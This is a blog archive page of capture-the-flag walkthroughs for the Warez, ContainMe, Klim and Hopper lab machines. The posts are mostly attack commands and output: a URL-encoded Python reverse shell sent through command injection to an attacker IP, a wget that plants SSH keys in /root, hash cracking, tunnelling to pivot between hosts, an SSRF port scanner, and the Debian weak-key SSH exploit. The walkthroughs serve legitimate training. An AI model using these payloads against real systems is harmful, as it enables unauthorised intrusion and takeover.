作者归档:站长

HackMyVm Warez Simple Walkthrough

发表评论

HackMyVm Warez Simple Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Warez

Two key steps.

First step, use Aria2 WebUI to download authorzied_keys into /home/carolina/.ssh, then we can login ssh as user carolina.

image-20210901220643988.png

Second step, use rtorrent to download authorzied_keys again into /root/.ssh.

 carolina@warez:~$ tail .rtorrent.rc
 # SCGI Connectivity (for alternative rtorrent interfaces, XMLRPC)
 # Use a IP socket with scgi_port, or a Unix socket with scgi_local.
 # schedule can be used to set permissions on the unix socket.
 #
 #network.scgi.open_port = "127.0.0.1:5000"
 #network.scgi.open_local = (cat,(session.path),/rpc.sock)
 #schedule2 = socket_chmod, 0, 0, "execute.nothrow=chmod,770,(cat,(session.path),/rpc.sock)"
 execute.throw = mkdir,/root/.ssh
 execute.throw = wget,http://192.168.56.150/authorized_keys,-O,/root/.ssh/authorized_keys

Vulnhub ContainMe: 1 Walkthrough

发表评论

Vulnhub ContainMe: 1 Walkthrough

https://www.vulnhub.com/entry/containme-1,729/

Interesting machine. Need ELF analysis, multi-layer port forward, etc. Learned new things.

Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.142  -oN ports.log[[195/235]
 ...
 22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
 |_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
 80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
 |_http-server-header: Apache/2.4.29 (Ubuntu)
 |_http-title: Apache2 Ubuntu Default Page: It works
 2222/tcp open  EtherNetIP-1?
 |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
 8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
 |   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
 |_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.33.142 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /info.php             (Status: 200) [Size: 68948]
 /index.html           (Status: 200) [Size: 10918]
 /index.php            (Status: 200) [Size: 329]

Check index.php, it will list files of current dir.

 ~ curl http://192.168.33.142/index.php
 <html>
 <body>
         <pre>
         total 28K
 drwxr-xr-x 2 root root 4.0K Jul 16 11:40 .
 drwxr-xr-x 3 root root 4.0K Jul 15 17:11 ..
 -rw-r--r-- 1 root root  11K Jul 15 17:11 index.html
 -rw-r--r-- 1 root root  154 Jul 16 11:40 index.php
 -rw-r--r-- 1 root root   20 Jul 15 17:27 info.php
         <pre>

 <!--  where is the path ?  -->

 </body>
 </html>

Maybe index.php has LFI. Fuzz the param name.

~ wfuzz -u 'http://192.168.33.142/index.php?FUZZ=id'  --hh 329  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013516:   200        10 L     13 W       79 Ch       "path"

It has code injection.

```bash
~ curl 'http://192.168.33.142/index.php?path=;id'; ...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
...


Get reverse shell as www-data.

 ```bash
~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.142.
 Ncat: Connection from 192.168.33.142:60146.
 bash: cannot set terminal process group (242): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@host1:/var/www/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@host1:/var/www/html$
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ curl 'http://192.168.33.142/index.php?path=;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'

Now we have reverse shell of host1. In /home/mike, found interesting file named 1cryptupx.

```bash
www-data@host1:/home/mike$ ls -la
ls -la
total 384
drwxr-xr-x 5 mike mike 4096 Jul 30 04:36 .
drwxr-xr-x 3 root root 4096 Jul 19 15:03 ..
lrwxrwxrwx 1 root mike 9 Jul 19 15:06 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 mike mike 3771 Apr 4 2018 .bashrc
drwx------ 2 mike mike 4096 Jul 30 04:36 .cache
drwx------ 3 mike mike 4096 Jul 30 04:36 .gnupg
-rw-r--r-- 1 mike mike 807 Apr 4 2018 .profile
drwx------ 2 mike mike 4096 Jul 19 15:27 .ssh
-rwxr-xr-x 1 mike mike 358668 Jul 30 04:39 1cryptupx


Run 1cryptupx with any string param, showed decompress error.

 ```bash
www-data@host1:/home/mike$ ./1cryptupx string
 ./1cryptupx string
 ░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
 ██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
 ██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
 ██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
 ╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
 ░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

 Unable to decompress.

We need to download 1cryptupx to local kali. Here I use xxd to display hex data of the file.

```bash
curl 'http://192.168.33.142/index.php?path=;xxd%20-ps%20/home/mike/1cryptupx';
...
0f7fb80039b93030919edc6e21ff1f407f40342f624343421f9e7f281839
f2788f787f88ffec8617bba37f0090ff807fb9d845c1d87fac7fe04d143c
39e0101a7fb292b393a1ffab9b7f680739f24226c468b268a2e1b8281808
ffd27fd19edc6e1f807f70e098ff3b902f36d77f604b4e28ff2d76c145eb
7f302f812d98867f277f0fa6db548103af977ff4ff9224098b00002a49ff
000000005550582100000000555058210d1608096e14e678c6222cc76007
000042020000d0a90d00491b00a2f4000000
<pre>

<!-- where is the path ? -->

</body>
</html>


Then restore 1cryptupx  through cyberchef.

image-20210901141024237.png

Use upx to decompress.

 ```bash
~ upx -d -o dec 1cryptupx                                                                                                                                                                                               fish-0 | 0 [14:11:26]
                        Ultimate Packer for eXecutables
                           Copyright (C) 1996 - 2020
 UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

         File size         Ratio      Format      Name
    --------------------   ------   -----------   -----------
     895440 <-    358668   40.05%   linux/amd64   dec

 Unpacked 1 file.

Decompile the file in ghidra, found key string "Unable to decompress", locate the key function.

 undefined8 FUN_004016ad(int param_1,long param_2)

 {
   ...
   if (param_1 == 2) {
     uVar3 = *(undefined8 *)(param_2 + 8);
     uStack1056 = 0x401721;
     iVar1 = thunk_FUN_004010d6(uVar3,&DAT_004955cb);
     pcVar4 = "\nYou wish!";
     if (iVar1 != 0) {
       uStack1056 = 0x40173a;
       thunk_FUN_0040101e(auStack1048,uVar3);
       uStack1056 = 0x401742;
       lVar2 = thunk_FUN_004010d6(auStack1048);
       if (auStack1048[lVar2 + -1] == '\n') {
         auStack1048[lVar2 + -1] = 0;
       }
       uStack1056 = 0x40175d;
       uVar3 = FUN_00401d90(auStack1048,"$2b$15$TXl.yuAF49958vsn1dqPfe");
       uStack1056 = 0x40176c;
       iVar1 = thunk_FUN_004010d6(uVar3,
                                  "$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6");
       if (iVar1 == 0) {
         uStack1056 = 0x40177b;
         FUN_00453290(0,0,0);
         uStack1056 = 0x401787;
         FUN_0041ddc0("/bin/bash");
         return 0;
       }
       pcVar4 = "Unable to decompress.";
     }
     uStack1056 = 0x401795;
     FUN_0041eaa0(pcVar4);
   }
   return 0;
 }

In this function, we get an hash string. It means if we input the correct password, the function will call "/bin/bash" as root.

We save the hash string into hash.txt.

 ~ echo '$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6' > hash.txt

Use john to brute force the hash.

 ~ john --wordlist=/usr/share/wordlists/seclists/Passwords/Common-Credentials/10k-most-common.txt  hash.txt                                                                                      vim-0 | 0 [20:32:26]
 Using default input encoding: UTF-8
 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
 Cost 1 (iteration count) is 32768 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 mike             (?)
 1g 0:00:02:03 DONE (2021-08-31 20:36) 0.008120g/s 1.461p/s 1.461c/s 1.461C/s internet..john
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed

Now we get the password of the file.

Search files with SUID.

 www-data@host1:/home/mike$ find / -perm -u=s 2>/dev/null
 find / -perm -u=s 2>/dev/null
 /usr/share/man/zh_TW/crypt
 /usr/bin/newuidmap
 /usr/bin/newgidmap
 ...

Notice the first file, run crypt with password, we get root on host1.

```bash
www-data@host1:/home/mike$ /usr/share/man/zh_TW/crypt mike
/usr/share/man/zh_TW/crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
root@host1:/home/mike# id
uid=0(root) gid=33(www-data) groups=33(www-data)


Check local ips, notice an interesting IP in another network range.

```bash
 root@host1:/home/mike# ifconfig
 ...
 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet 172.16.20.2  netmask 255.255.255.0  broadcast 172.16.20.255
         inet6 fe80::216:3eff:fe46:6b29  prefixlen 64  scopeid 0x20<link>
 ...

Scan for live hosts on this ip range with bash command, found live host 172.16.20.6.

 root@host1:~# for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5  >/dev/null && echo "172.16.20.$i" &) ;done
 172.16.20.2
 172.16.20.6

Scan for open ports of host2.

 for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open
 ...
 port 22 is open

Here is a little tricky. We can login host2 with user name mike and id_rsa of mike on host1.

 root@host1:/# cd /home/mike/.ssh/
 root@host1:/home/mike/.ssh# ssh mike@172.16.20.6 -i id_rsa

 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.

 Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
 mike@host2:~$

Check local ports of host2, mysql is running.

 mike@host2:/home$ ss -ntlp
 State               Recv-Q               Send-Q                              Local Address:Port                              Peer Address:Port              
 LISTEN              0                    80                                      127.0.0.1:3306                                   0.0.0.0:*                  
 LISTEN              0                    128                                 127.0.0.53%lo:53                                     0.0.0.0:*                  
 LISTEN              0                    128                                       0.0.0.0:22                                     0.0.0.0:*                  
 LISTEN              0                    128                                          [::]:22                                        [::]:*

We need to port forward 3306 outside, in order to brute force it.

First, on host1, we use ssh -L to map host2:3306 ==> host1:3306.

 root@host1:/home/mike/.ssh# ssh -g -L 3306:127.0.0.1:3306 mike@172.16.20.6 -i id_rsa

Check ports of host1, 3306 is open.

 root@host1:~# ss -ntlp
 State   Recv-Q   Send-Q      Local Address:Port      Peer Address:Port                                                                            
 LISTEN  0        128         127.0.0.53%lo:53             0.0.0.0:*       users:(("systemd-resolve",pid=138,fd=13))                              
 LISTEN  0        128               0.0.0.0:22             0.0.0.0:*       users:(("sshd",pid=199,fd=3))                                          
 LISTEN  0        128             127.0.0.1:3306           0.0.0.0:*       users:(("ssh",pid=1870,fd=5))                                          
 LISTEN  0        128                     *:80                   *:*       users:(("apache2",pid=613,fd=4),("apache2",pid=602,fd=4),("apache2",pid=592,fd=4),("apache2",pid=457,fd=4),("apache2",pid=375,fd=4),("apache2",pid=270,fd=4),("apache2",pid=269,fd=4),("apache2",pid=268,fd=4),("apache2",pid=257,fd=4))
 LISTEN  0        128                  [::]:22                [::]:*       users:(("sshd",pid=199,fd=4))                                          
 LISTEN  0        128                 [::1]:3306              [::]:*       users:(("ssh",pid=1870,fd=4))

Then we need to map host1:3306 outside to kali, but host1 has limits, so ssh and socat all don't work. We have to use chisel.

On kali, run chisel server.

 ~ ./chisel server -p 8080 --reverse  
 2021/09/01 13:26:59 server: Reverse tunnelling enabled
 2021/09/01 13:26:59 server: Fingerprint QJGGHnimzCp6x3qmFZtvSyGo1ycXNZT7o9iyG537DF8=
 2021/09/01 13:26:59 server: Listening on http://0.0.0.0:8080

Then on host1, run chisel client.

 root@host1:~# ./chisel client http://192.168.33.128:33060 R:3306:127.0.0.1:33060

Now check port of kali, port 3306 is open.

The path is: kali:3306 ==> host1:3306 ==> host2:3306.

 ~ ss -ntlp                                                                                                                                                          
 State                    Recv-Q                   Send-Q                                     Local Address:Port                                     Peer Address:Port
 LISTEN                   0                        50                                             127.0.0.1:9614                                          0.0.0.0:*  
 LISTEN                   0                        511                                            127.0.0.1:6463                                          0.0.0.0:*  
 LISTEN                   0                        4096                                                   *:3306                                                *:*  
 LISTEN                   0                        4096                                                   *:8080                                                *:*

Use medusa to bruteforce password of mysql on kali.

 ~ medusa  -h 127.0.0.1 -M mysql -u mike -P /usr/share/wordlists/rock_ascii.txt -t 50
 Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
 ...
 ACCOUNT FOUND: [mysql] Host: 127.0.0.1 User: mike Password: password [SUCCESS]
 ...

Next on host2, login mysql, get password of root.

 mysql> select * from users;
 +-------+---------------------+
 | login | password            |
 +-------+---------------------+
 | root  | bjsig4868fgjjeog    |
 | mike  | WhatAreYouDoingHere |
 +-------+---------------------+
 2 rows in set (0.00 sec)

Su to root on host2. Found mike.zip in /root.

 root@host2:~# ls -la
 total 28
 drwx------  4 root root 4096 Jul 19 20:35 .
 drwxr-xr-x 22 root root 4096 Jun 29 08:07 ..
 lrwxrwxrwx  1 root root    9 Jul 19 20:32 .bash_history -> /dev/null
 -rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
 drwxr-xr-x  3 root root 4096 Jul 15 14:47 .local
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 drwx------  2 root root 4096 Jul 15 14:41 .ssh
 -rw-------  1 root root  218 Jul 16 02:26 mike.zip

Unzip mike.zip with password from database. Get final flag.

 oot@host2:~# unzip mike.zip
 Archive:  mike.zip
 [mike.zip] mike password:
  extracting: mike                    
 root@host2:~# cat mike
 THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
 root@host2:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 host2

HackMyVm Klim Walkthrough

发表评论

HackMyVm Klim Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Klim

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100
 Host is up (0.0024s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
 |   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
 |_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Ubuntu Default Page: It works Annex02!
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found wordpress.

```bash
/index.html (Status: 200) [Size: 11331]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]


Use wpscan to scan /wordpress, but found nothing useful. Manually check /wp-contents/uploads, found an image.

```bash
 ~ wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg
</code></pre>
<p>Found decrypt password, get file dump.</p>
<pre><code class="language-bash"> ~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt                                                                                                                                   steghide-0 | 1 [10:35:13]
 StegSeek version 0.5
 Progress: 10.94% (15259007 bytes)          

 [i] --> Found passphrase: "ichliebedich"
 [i] Original filename: "dump"
 [i] Extracting to "image.jpg.out"
 ~ mv image.jpg.out dump</code></pre>
<p>Found login credentials in dump.</p>
<pre><code class="language-bash">~ cat dump|grep pwd
 log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
 ~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
 ss7WhrrnnHOZC#9bQn
</code></pre>
<p>Login wordpress, in Plugin Editor, modify one php file and add your php shell code into source.</p>
<p>Then get reverse shell.</p>
<pre><code class="language-bash"> ~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:57032.
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)</code></pre>
<p>Check sudo -l of www-data.</p>
<pre><code class="language-bash"> www-data@klim:/home/klim$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on klim:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on klim:
     (klim) NOPASSWD: /home/klim/tool</code></pre>
<p>Decompile tool, read the source code. It actually does "cat argv[1]".</p>
<p>```c
int __cdecl main(int argc, const char <strong>argv, const char </strong>envp)
{
size_t v3; // rbx
size_t v4; // rax
char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
char *dest; // [rsp+20h] [rbp-20h]
size_t size; // [rsp+28h] [rbp-18h]</p>
<p>strcpy(s, "cat ");
v3 = strlen(s);
size = v3 + strlen(argv[1]) + 1;
dest = (char *)malloc(size);
strncpy(dest, s, size);
v4 = strlen(s);
strncat(dest, argv[1], size - v4);
system(dest);
return 0;
}</p>
<pre><code>
Get ssh key of user klim.

```bash
 www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
 sudo -u klim ./tool .ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
 ...
 jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
 Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
 49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
 -----END OPENSSH PRIVATE KEY-----
 www-data@klim:/home/klim$

Login ssh as klim.

~ ssh klim@192.168.56.100 -i id_rsa
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
 /usr/bin/xauth:  file /home/klim/.Xauthority does not exist
 klim@klim:~$ id
 uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found id_rsa.pub in /opt, following author's hint, use openssl

```bash
~ searchsploit openssl ...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...


Following the steps in poc.

  ```bash
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
  tar -jxvf 5622.tar.bz2
  python 5720.py rsa/2048 192.168.56.100 root 22
  Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec

 Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
 Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100

 Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec

Get root login.

```bash
~ ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
...
root@klim:~# id;hostname
uid=0(root) gid=0(root) groupes=0(root)
klim

HackMyVm Hopper Walkthrough

发表评论

HackMyVm Hopper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hopper

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                  
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.00079s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
 |   256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
 |_  256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.z[500/1872]
403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 80]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]


Check /advanced-search, input anything and click "Submit", notice the url became "http://192.168.56.100/advanced-search/path.php?path=xxx". Fuzz if there is LFI.

 ```bash
~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.
 txt                                                                                                    
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000005:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
 000000001:   200        27 L     39 W       1439 Ch     "/etc/passwd"
 000000018:   200        12 L     88 W       664 Ch      "/etc/fstab"                                    
 ...
 000000188:   200        0 L      1 W        32064 Ch    "/var/log/faillog"
 000000224:   200        1 L      4 W        1151 Ch     "/var/run/utmp"
 000000220:   200        34 L     237 W      164321 Ch   "/var/log/wtmp"
 000000199:   200        0 L      1 W        292584 Ch   "/var/log/lastlog"

Get username through passwd.

```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash


Make a python script to enum local port.

 ```python
#!/usr/bin/python3
 import requests

 for port in range(1,65535):
     res = requests.get(f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}')
     if len(res.text) == 0:
         continue
     else:
         print(f'port {port} is open.')

Port 2222 is open.

```bash
~ python3 enum.py
port 22 is open.
port 80 is open.
port 2222 is open.


Check port 2222.

 ```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'    
 <!DOCTYPE html>
 <html>
 <body>

 <h1>[+] WARNING</h1>

 <p> - Private corporative web server</p>

 <p> - If you are non organization personal, leave immediately</p>

 </body>
 </html>

Fuzz dirs of port 2222.

```bash
~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'; -t 50 -w /usr/share/dirbuster/wordlists/directory-lis
t-2.3-medium.txt -b 401,403,404,500 --wildcard --exclude-length 181

/backup (Status: 200) [Size: 1751]
...


Get a id_rsa key at /backup. Chmod 600. Burteforce the key of id_rsa.

 ```bash
~ /usr/share/john/ssh2john.py id_rsa  > hash.txt  
 & kali @ mykali in ~/Documents/hopper 0 [13:03:29]
 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt                                         ...
 barcelona        (id_rsa)

Login ssh with user name edward.

 ~ ssh edward@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/edward/.Xauthority does not exist
 edward@hopper:~$ id
 uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Upload a reverse shell php and get shell as www-data.

 ~ curl http://192.168.56.100/r.php
 ────────────────────────────────────────────────────────────────────────────────────────────────────────

 & kali @ mykali in ~/Documents/hopper 0 [13:07:35]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:35698.
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  07:07:50 up  1:41,  0 users,  load average: 0.01, 0.02, 0.02
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo -l.

```bash
www-data@hopper:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on hopper:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on hopper:
(henry) NOPASSWD: /usr/bin/watch


Set the term environment variable, and escalate to user henry.

```bash
 www-data@hopper:/$ export TERM=xterm-256color
 export TERM=xterm-256color
 www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 $ id
 id
 uid=1001(henry) gid=1001(henry) groups=1001(henry)</code></pre>
<p>Upload id_rsa.pub to /home/henry/.ssh/, change name to authorized_keys, and get ssh login as user henry.</p>
<pre><code class="language-bash">~ ssh henry@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/henry/.Xauthority does not exist
 henry@hopper:~$ id
 uid=1001(henry) gid=1001(henry) grupos=1001(henry)</code></pre>
<p>Check sudo -l.</p>
